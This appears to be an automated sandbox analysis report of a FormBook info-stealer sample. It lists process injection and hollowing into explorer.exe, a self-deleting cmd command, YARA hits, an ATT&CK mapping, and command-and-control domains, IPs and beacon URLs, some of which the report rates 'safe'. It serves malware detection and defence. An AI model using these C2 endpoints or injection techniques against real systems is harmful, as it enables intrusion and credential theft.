          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_0099E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009A7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A5AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A5AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009A766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009A8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A17794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A17794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A17794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009D37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009CA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009CA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009BB73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A6070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A6070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009CE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A2FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A2FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00994F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00994F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_00A68F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009AEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\444890321.exeCode function: 1_2_009AFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E403E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E3DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E953CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E44BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E44BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E44BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03EE5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03ED138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03ECD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E21B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E21B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E42397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E4B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E1DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E43B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E43B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E1DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03EE8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E1F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03ED131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E42AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E42ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E152A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E2AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E2AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E4FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E4D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E4D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03ECB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03ECB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03EE8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E5927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E19240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03EDEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03EA4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E54A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E54A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E3A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E28A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E15210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E15210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E15210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E15210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\WWAHost.exeCode function: 10_2_03E1AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 10_2_03E1AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 10_2_03EDAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 10_2_03EDAA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 10_2_03E33A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 10_2_03E1B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 10_2_03E1B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 10_2_03E1B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 10_2_03EA41E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 10_2_03E461A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 10_2_03E461A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 10_2_03ED49A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 10_2_03ED49A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 10_2_03ED49A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 10_2_03ED49A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 10_2_03E969A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 10_2_03E951BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 10_2_03E951BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 10_2_03E951BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 10_2_03E951BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 10_2_03E3C182 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 10_2_03E4A185 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 10_2_03E42990 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 10_2_03E1C962 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 10_2_03E1B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 10_2_03E1B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 10_2_03E3B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 10_2_03E3B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 10_2_03E34120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 10_2_03E34120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 10_2_03E34120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 10_2_03E34120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 10_2_03E34120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 10_2_03E4513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 10_2_03E4513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 10_2_03E19100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 10_2_03E19100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 10_2_03E19100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 10_2_03E140E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 10_2_03E140E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 10_2_03E140E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 10_2_03E158EC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 10_2_03EAB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 10_2_03EAB8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 10_2_03EAB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 10_2_03EAB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 10_2_03EAB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 10_2_03EAB8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 10_2_03E420A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 10_2_03E420A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 10_2_03E420A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 10_2_03E420A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\444890321.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WWAHost.exe | Process token adjusted: Debug

          HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Network Connect: 35.169.40.107 80
Source: C:\Windows\explorer.exe | Domain query: www.mekarauroko7389.com
Source: C:\Windows\explorer.exe | Domain query: www.oklahomasundayschool.com
Source: C:\Windows\explorer.exe | Network Connect: 199.59.242.153 80
Source: C:\Windows\explorer.exe | Network Connect: 163.44.239.72 80
Source: C:\Windows\explorer.exe | Domain query: www.shamushalkowich.com
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\444890321.exe | Section loaded: unknown target: C:\Users\user\Desktop\444890321.exe protection: execute and read and write
Source: C:\Users\user\Desktop\444890321.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\Desktop\444890321.exe | Section loaded: unknown target: C:\Windows\System32\backgroundTaskHost.exe protection: execute and read and write
Source: C:\Users\user\Desktop\444890321.exe | Section loaded: unknown target: C:\Windows\System32\backgroundTaskHost.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\WWAHost.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\WWAHost.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\444890321.exe | Thread register set: target process: 3388
Source: C:\Windows\SysWOW64\WWAHost.exe | Thread register set: target process: 3388
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\444890321.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\444890321.exe | Section unmapped: C:\Windows\System32\backgroundTaskHost.exe base address: A30000
Source: C:\Users\user\Desktop\444890321.exe | Process created: C:\Users\user\Desktop\444890321.exe 'C:\Users\user\Desktop\444890321.exe'
Source: C:\Windows\SysWOW64\WWAHost.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\444890321.exe'
Source: explorer.exe, 00000004.00000000.215576974.0000000001398000.00000004.00000020.sdmp | Binary or memory string: ProgmanamF
Source: explorer.exe, 00000004.00000000.215844960.0000000001980000.00000002.00000001.sdmp, WWAHost.exe, 0000000A.00000002.472475721.0000000005080000.00000002.00000001.sdmp | Binary or memory string: Program Manager
Source: explorer.exe, 00000004.00000000.215844960.0000000001980000.00000002.00000001.sdmp, WWAHost.exe, 0000000A.00000002.472475721.0000000005080000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000004.00000000.215844960.0000000001980000.00000002.00000001.sdmp, WWAHost.exe, 0000000A.00000002.472475721.0000000005080000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000004.00000000.215844960.0000000001980000.00000002.00000001.sdmp, WWAHost.exe, 0000000A.00000002.472475721.0000000005080000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\444890321.exe | Code function: 0_2_00405B88 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

          Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 0000000A.00000002.469354418.0000000003230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.469573430.00000000032E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000001.207643919.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.264934949.0000000000910000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.210395698.00000000023B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.264873769.00000000008B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.264645611.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 1.2.444890321.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.444890321.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.444890321.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.444890321.exe.23b0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.444890321.exe.23b0000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.444890321.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

Yara detected FormBook
Source: Yara match | File source: 0000000A.00000002.469354418.0000000003230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.469573430.00000000032E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000001.207643919.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.264934949.0000000000910000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.210395698.00000000023B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.264873769.00000000008B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.264645611.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 1.2.444890321.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.444890321.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.444890321.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.444890321.exe.23b0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.444890321.exe.23b0000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.444890321.exe.400000.0.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Native API (1) | Path Interception | Process Injection (512) | Rootkit (1) | Credential API Hooking (1) | Security Software Discovery (131) | Remote Services | Credential API Hooking (1) | Exfiltration Over Other Network Medium | Encrypted Channel (1) | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot (1)
Default Accounts | Shared Modules (1) | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion (3) | LSASS Memory | Virtualization/Sandbox Evasion (3) | Remote Desktop Protocol | Archive Collected Data (1) | Exfiltration Over Bluetooth | Ingress Tool Transfer (1) | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection (512) | Security Account Manager | Process Discovery (2) | SMB/Windows Admin Shares | Clipboard Data (1) | Automated Exfiltration | Non-Application Layer Protocol (2) | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Deobfuscate/Decode Files or Information (1) | NTDS | Remote System Discovery (1) | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol (12) | SIM Card Swap | Carrier Billing Fraud |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information (3) | LSA Secrets | File and Directory Discovery (3) | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Software Packing (11) | Cached Domain Credentials | System Information Discovery (13) | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |

          Behavior Graph

Behavior Graph ID: 433174 | Sample: 444890321.exe | Start date: 11/06/2021 | Architecture: WINDOWS | Score: 100
Sample-level signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 6 other signatures
Process tree recovered from the graph:
• 444890321.exe (started)
  Dropped file: C:\Users\user\AppData\Local\...\System.dll, PE32
  Signatures: Detected unpacking (changes PE section rights); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
  • 444890321.exe (started)
    Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
    • explorer.exe (injected)
      DNS/IP: mekarauroko7389.com 163.44.239.72, 49728, 80, INTERQGMOInternetIncJP, Japan; www.oklahomasundayschool.com 199.59.242.153, 49735, 80, BODIS-NJUS, United States; 2 other IPs or domains
      Signatures: System process connects to network (likely due to code injection or exploit)
      • WWAHost.exe (started)
        Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
      • autochk.exe (started)
    • backgroundTaskHost.exe (started)
      • cmd.exe (started)
        • conhost.exe (started)


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

Source | Detection | Scanner | Label
444890321.exe | 23% | Metadefender |
444890321.exe | 68% | ReversingLabs | Win32.Backdoor.Androm
444890321.exe | 100% | Joe Sandbox ML |

          Dropped Files

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\nskAF64.tmp\System.dll | 0% | Metadefender |
C:\Users\user\AppData\Local\Temp\nskAF64.tmp\System.dll | 0% | ReversingLabs |

          Unpacked PE Files

Source | Detection | Scanner | Label
1.0.444890321.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1137482
1.2.444890321.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
0.0.444890321.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1137482
0.2.444890321.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1137482
10.2.WWAHost.exe.431f834.5.unpack | 100% | Avira | TR/Patched.Ren.Gen
10.2.WWAHost.exe.34498d0.2.unpack | 100% | Avira | TR/Patched.Ren.Gen
0.2.444890321.exe.23b0000.3.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
1.1.444890321.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs

Source | Detection | Scanner | Label
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
https://www.shamushalkowich.com/ccr/?FJB=UiEpDr7iywR9iaGhQyAzq1r0qRPgWcdm1KzonEEBzxfYIUCNIf2vy6uHRev | 0% | Avira URL Cloud | safe
http://www.oklahomasundayschool.com/ccr/?FJB=AxjKtjbRfNJtNPnejOfQjb3R2KRHRMY2w4U1+yq2aSZlRtrxzdj5Yr2imIB9O7nqKvHd&v0=JDK8Zp | 0% | Avira URL Cloud | safe
http://www.tiro.com | 0% | URL Reputation | safe
http://www.mekarauroko7389.com/ccr/?FJB=DYL3Mol3r87Z8qId+4Ycjijbq71Py48wOU/SaqdUDZ5D3FcnOOzajI1IKd683KRXh37z&v0=JDK8Zp | 0% | Avira URL Cloud | safe
http://www.shamushalkowich.com/ccr/?FJB=UiEpDr7iywR9iaGhQyAzq1r0qRPgWcdm1KzonEEBzxfYIUCNIf2vy6uHRevKVZrdd8Pf&v0=JDK8Zp | 0% | Avira URL Cloud | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
